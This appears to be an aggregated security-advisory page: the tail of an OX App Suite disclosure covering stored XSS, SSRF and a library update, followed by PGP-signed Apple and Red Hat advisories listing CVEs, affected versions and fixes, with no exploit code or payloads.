CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
XSS using "upsell" triggers. Non-alphanumeric content can be injected by the user as JS content for the "upsell" module. As a result, the code will be executed during subsequent logins and opening the "Portal" application, enabling a persistent cross-site scripting attack vector.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We improved the allow-list sanitizing algorithm to deal with non-alphanumeric code.

---

Internal reference: OXUIB-1933  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite frontend 7.10.5-rev38, OX App Suite frontend 7.10.6-rev19  
First fixed revision: OX App Suite frontend 7.10.5-rev39, OX App Suite frontend 7.10.6-rev20  
Discovery date: 2022-09-26  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43696  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
XSS using "upsell ads". HTML content can be injected by the user as JS content for the "upsell ads" module. As a result, the code will be executed during subsequent logins and opening the "Portal" application, enabling a persistent cross-site scripting attack vector.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We improved the sanitization process for upsell ads.

---

Internal reference: MWB-1784  
Vulnerability type: CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-08-16  
Solution date: 2022-10-25  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43697  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Details:  
"Tracking" features can be used to inject arbitrary script code. In case activity tracking adapters are enabled but not defined, users can use jslob to define own tracking settings for an account. This allows adding arbitrary values to trigger a specific URL or load a library.

Risk:  
Malicious script code can be executed within the victims context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require temporary access to the users account or lure a user to a compromised account. No publicly available exploits are known.

Solution:  
We made the related jslob configuration endpoint read-only for users.

---

Internal reference: MWB-1823  
Vulnerability type: CWE-918 (Server-Side Request Forgery (SSRF))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-09-14  
Solution date: 2022-10-24  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43698  
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Details:  
SSRF using POP3 account updates. When changing a valid external POP3 mail account as a user, the operation to update the accounts settings did not consider deny-list values.

Risk:  
Server-initiated requests can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. While no data of such services can be exfiltrated, the risk is a violation of perimeter based security policies. No publicly available exploits are known.

Solution:  
We now check compliance with existing deny-list content when updating POP3 mail accounts.

---

Internal reference: MWB-1862  
Vulnerability type: CWE-918 (Server-Side Request Forgery (SSRF))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30  
Discovery date: 2022-10-06  
Solution date: 2022-11-07  
Disclosure date: 2023-02-08  
CVE: CVE-2022-43699  
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Details:  
Mail account discovery can be abused for SSRF. The external E-Mail autodiscovery feature performs connections checks based on the E-Mail addresses host-part. Those do not take existing deny-lists into respect, allowing attackers with access to DNS records of a domain to redirect requests to illegal addresses.

Risk:  
Server-initiated requests can be directed to internal resources that are restricted based on deny-list settings. This can be used to determine "internal" addresses and services, depending on measurement and content of error responses. While no data of such services can be exfiltrated, the risk is a violation of perimeter based security policies. No publicly available exploits are known.

Solution:  
We check for compliance with existing deny-list content when performing mail account autodiscovery.

---

Internal reference: MWB-1882, DOCS-4580  
Vulnerability type: CWE-94 (Improper Control of Generation of Code ('Code Injection'))  
Component: office  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Last affected revision: OX App Suite backend 7.10.5-rev50, OX App Suite backend 7.10.6-rev29, OX App Suite office 7.10.5-rev10, OX App Suite office 7.10.6-rev5  
First fixed revision: OX App Suite backend 7.10.5-rev51, OX App Suite backend 7.10.6-rev30, OX App Suite office 7.10.5-rev11, OX App Suite office 7.10.6-rev6  
Discovery date: 2022-10-19  
Solution date: 2022-10-21  
Disclosure date: 2023-02-08  
CVE: CVE-2022-42889  
CVSS: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Details:  
Apache Commons Text Update. A critical vulnerability at the Apache Commons Text library has been identified, which is used by OX App Suite and OX Documents. However, our products do not directly use the vulnerable StringSubstitutor class. Based on current knowledge that means our products are not vulnerable.

Risk:  
Remote Code Execution, see CVE-2022-42889. No publicly available exploits are known.

Solution:  
We provided a update for this library to resolve the risk as a precaution, in case custom implementations use the vulnerable class.

OX App Suite Cross Site Scripting / Server-Side Request Forgery

Apple Security Advisory 2023-02-13-3 - Safari 16.3.1 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-3 Safari 16.3.1Safari 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213638.WebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PMACgkQ4RjMIDkeNxmFTBAA05jcHEZOdXuE0BQKft0qoWItZ2Dg0p/ONxiqS9ihNDqBt+6q+yOORvr4Vr2iVpCpo4F5nQv/qBApGCS84SVN9rRIM1VteOYIObgpo37CceODrbywjSTHcD6GbR47ra8reQK10sDSIoQtX1XKGUltUC/RfKnVDtk/coNu7TJj/VVg2YNPOlQFc5ETie0d/NOcK+8Ds1NvK4HQ0Gfq+KHmE507T7nAMfcK4YVlZCtkz4YHEa9w9AcIgmQ4nzlOSEs5mHu2egr70Xy8+CL7i82Oh2FBzVetLkDhhrZppjykX7zK4Lc0cbABpiaIu/6ObPGhoW4sFfPCJa8NSflRLKe+aNHdyuzjuqx8rSeqFdP4+rhdI/X2Z/9VKsB/1Tch55nuBhEGZTejmdwtorGf1+otfW5XpWOGXwnE9sR0qjVvwPwfuK5noLUoLvBRfiK6xaKUG6IXEYCt0rVncJJ9QtJJKYvqhbf3OwNodrA/V9AAm2MTtIo514BkfZHtv01xOm7tv35a+5QFcoW/iJBvdTxGVCwzb+2AshMCqO9MQxt8cWknC41K0l6Fl6Yl/P0qzUJr4NoG72LwW0PqaHimWDVAqJcAHsESe/1qnLO3rZItQJByxURc4wUpHAojsFBEBtLiS7FNHOvw4bM1ylQIXXoiFD7sE9NpvksUDzNoRdyAEOM==b0uc-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-3

Red Hat Security Advisory 2023-0758-01 - This release of Red Hat build of Quarkus 2.13.7 includes security updates, bug fixes, and enhancements. For more information, see the release notes page listed in the References section. Issues addressed include code execution, denial of service, deserialization, and information leakage vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat build of Quarkus 2.13.7 release and security update  
Advisory ID:       RHSA-2023:0758-01  
Product:           Red Hat build of Quarkus  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0758  
Issue date:        2023-02-14  
CVE Names:         CVE-2022-1471 CVE-2022-41881 CVE-2022-41946   
                   CVE-2022-45047 CVE-2023-0044   
=====================================================================

1. Summary:

An update is now available for Red Hat build of Quarkus.

Red Hat Product Security has rated this update as having a security impact  
of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a  
detailed severity rating, is available for each vulnerability. For more  
information, see the CVE links in the References section.

2. Description:

This release of Red Hat build of Quarkus 2.13.7 includes security updates,  
bug  
fixes, and enhancements. For more information, see the release notes page  
listed in the References section.

Security Fix(es):

* CVE-2022-1471 snakeyaml: Constructor Deserialization Remote Code  
Execution [quarkus-2.13]

* CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
[quarkus-2.13]

* CVE-2022-45047 sshd-common: mina-sshd: Java unsafe deserialization  
vulnerability [quarkus-2.13]

* CVE-2023-0044 quarkus-vertx-http: a cross-site attack may be initiated  
which might lead to the Information Disclosure [quarkus-2.13]

* CVE-2022-41946 jdbc-postgresql: postgresql-jdbc:  
PreparedStatement.setText(int, InputStream) will create a temporary file if  
the InputStream is larger than 2k [quarkus-2.13]

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2145194 - CVE-2022-45047 mina-sshd: Java unsafe deserialization vulnerability  
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution  
2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS  
2153399 - CVE-2022-41946 postgresql-jdbc: PreparedStatement.setText(int, InputStream) will create a temporary file if the InputStream is larger than 2k  
2158081 - CVE-2023-0044 quarkus-vertx-http: a cross-site attack may be initiated which might lead to the Information Disclosure

5. References:

https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-41881  
https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/cve/CVE-2022-45047  
https://access.redhat.com/security/cve/CVE-2023-0044  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=redhat.quarkus&downloadType=distributions&version=2.13.7  
https://access.redhat.com/documentation/en-us/red_hat_build_of_quarkus/2.13/  
https://access.redhat.com/articles/4966181

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+vS5tzjgjWX9erEAQi0OQ/+Mgak6d18DR8wCQDeY7f0vj2o3dOhxsE0  
wgo5LZhoghb0R9pXnEKL5cYgJlXr0XiDDNxJPUzplK9+v3gLLdIr3TtNDge56/+p  
hdCjru2lHe5q8I2KBjVKZr2gNX+xIcavSNf9R2zD0LnG8CEslrSYS/6nBycWnp9A  
aWikyfve5zKCgoNrcBdaRM3LNnzCNAfEHe7pRuMjSjzY4E1FQUlO+FctDH0ICI/C  
0SGZdRos1gM1sPET7eZX9thButpUBSBBNLAgrtbtBHji4eiZtA5TPCDK+TP7SnVb  
QvKFXF10BZpG6f2rknahUcvnsqnFaQMj6a5wSYwoNqtbaJbnbW+FdM29OSjNYorN  
5wO2IUDiS3XfbuAeqCA1CF9G+XAmIBtest7ZDRRKqn4lZHz0+s0/qkbI+5tfQ9fm  
elYU8OBxDC2FCDjsjc3GbXm1skMHFXIZQIBXaN4E6FOjWJQXh++23yD0JoVMTB1h  
iPtPbWdlH5li99Myvkiz6V0u5ejbVCjNEQXNsl6Cf5b05h84qfxizfPqHS0Cyn6f  
idpzGqE7LxWBlSgbiImVLKHD1RnlAlrblspQizTZYK6z1BApExgzJX2d8fwbphTX  
/ZiPZqsVKyLobj8MRpFLpf0evRYhEcSdk0VbiLL+/yQ5oFfH2SYmy1N/kbGfTUcS  
OMvJd4+JZOY=  
=EubT  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0758-01

Apple Security Advisory 2023-02-13-2 - macOS Ventura 13.2.1 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-02-13-2 macOS Ventura 13.2.1

macOS Ventura 13.2.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213633.

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of Google  
Project Zero

Shortcuts  
Available for: macOS Ventura  
Impact: An app may be able to observe unprotected user data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2023-23522: Wenchao Li and Xiaolong Bai of Alibaba Group

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: A type confusion issue was addressed with improved  
checks.  
WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

macOS Ventura 13.2.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PIACgkQ4RjMIDke  
NxkM2hAApRo7JQlaNxVVpw1y96PG2oAVygFVw+N1cpEO72L4gDjvAb7+tOBqUTkz  
Az+IizQfC2gapw9g/csghk+s+/gt16Q0iX4jDDEDypZ5So/LoaucFVTbGCy9Hns0  
T0PTS4a0KIFBHbRQ3ktrhkUp49ykqDWwWdnvM1QgtUe3HfAZQWHVnYpdsj26CTaz  
5ihA0chuzAGnx2lUZbyz8nl6f9kdqx1x8uSF0P7AkIp6L7IcZOLLO8tXnKApeC7S  
HSbafe7JKxVNPtzaI/ZuxQe9/9Kr8VUiezVCK+WvJ9akRsy4CQ022yirIOlFIEhF  
32mFq+BaQ77YTULP2us7BG8oMJ3tPxfmlykhqD4P0p4JRW6ZFoQmVKyUEPdsaALG  
NYilSR3CRSpaCbh+dunGMJshNSHRJO6NluLq1mPVB7xFSiypgJADjS95zBSINtC9  
JrKusbpICiAm8VqVC4GNltG+djft0NjbSiJXPo409X7j01Bt1ZJpk2UWTUfZbHMU  
hW90JFySoHLRcVt3Af1mbBkyaHv0GSKG+Fjul/XyBlG3U8eJVXJhWCrhMjm17GK0  
6j4HEUsAYzAg0j+Ss7QQKhwxlW3BPd+3D2kGwbPzBx/rcyVjbc456fyCLSYP58cf  
EIYmmOwF9QcH939TCxoIglHOsdAuuIilGApd2on9QWOj8QSaUFw=  
=2kFu  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-2

Red Hat Security Advisory 2023-0632-01 - Logging Subsystem 5.4.11 - Red Hat OpenShift.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift (Logging Subsystem) security update  
Advisory ID:       RHSA-2023:0632-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0632  
Issue date:        2023-02-15  
CVE Names:         CVE-2022-4883 CVE-2022-23521 CVE-2022-30123   
                   CVE-2022-40303 CVE-2022-40304 CVE-2022-41717   
                   CVE-2022-41903 CVE-2022-44617 CVE-2022-46285   
                   CVE-2022-47629 CVE-2023-21835 CVE-2023-21843   
=====================================================================

1. Summary:

An update is now available for the Logging subsystem for Red Hat OpenShift  
5.4.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.4.11 - Red Hat OpenShift

Security Fix(es):

* rubygem-rack: crafted requests can cause shell escape sequences  
(CVE-2022-30123)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2099524 - CVE-2022-30123 rubygem-rack: crafted requests can cause shell escape sequences  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. References:

https://access.redhat.com/security/cve/CVE-2022-4883  
https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-30123  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/cve/CVE-2022-44617  
https://access.redhat.com/security/cve/CVE-2022-46285  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+zQANzjgjWX9erEAQiH1g//X870GJDPdbNfdY26uTCuTK2PebCDghmn  
aHyyZUj1dt0EGxtNsjqcG3ivrgbaSEhEOnQaE3IkRQoEK8XWVFtodr8fw6VnFHSG  
rrgKn/Kl4zHaDpIRRFPpImHBEUYJiXYh2AX9+IASkvi8/J90enitS8S1cCYRQmTO  
DS3CHnpKa1EmlVZaD5DqZacoQl7n8rHZRXtMQ9oel2FuymSXEUHkBQSYfPLLLjuP  
yOTeYi5jn3JWH3xSzCzi65jm0P3n6IzQqKU45Hn8fMbNbcoTrl+Q1QMuCwxQLjQr  
mfHO+U8nmGbqoLcvazMcOQ5UFyX/R4WJkef19BxUiCiH2xCsl1k2bmFn7Ofu5Q5E  
0s6+DNx2s6BMP2DBTvFggYNoEaz6uP0yPnYuCKX0PPp+lgydMcE4FPO2hLjhOTr/  
5nFaQW8tHMJ1zFUmrux8xnPBf5W6ivaa5tKJV1u6BCJSi7PcGcd1a+cq3HaUOpqr  
CFZtKsLr+/yQBSZlRDpurbpwK+499/fU/R5M3ya3Rswa7XuA7uEzsYceZ8rsXk34  
n94845yMc9OL57rw0Ld5shgH8G8IFULrorcS+Yj0LL6yZa4zKpGdqawsiG2X7E+j  
BD9y5xpmQ3tqwcjP7LcIKFq/9Xcc9g4F99bu4BNGV7+DzdMFFIgCGpdkO8JrjNVW  
EgMXmUtLcsI=  
=cn0O  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js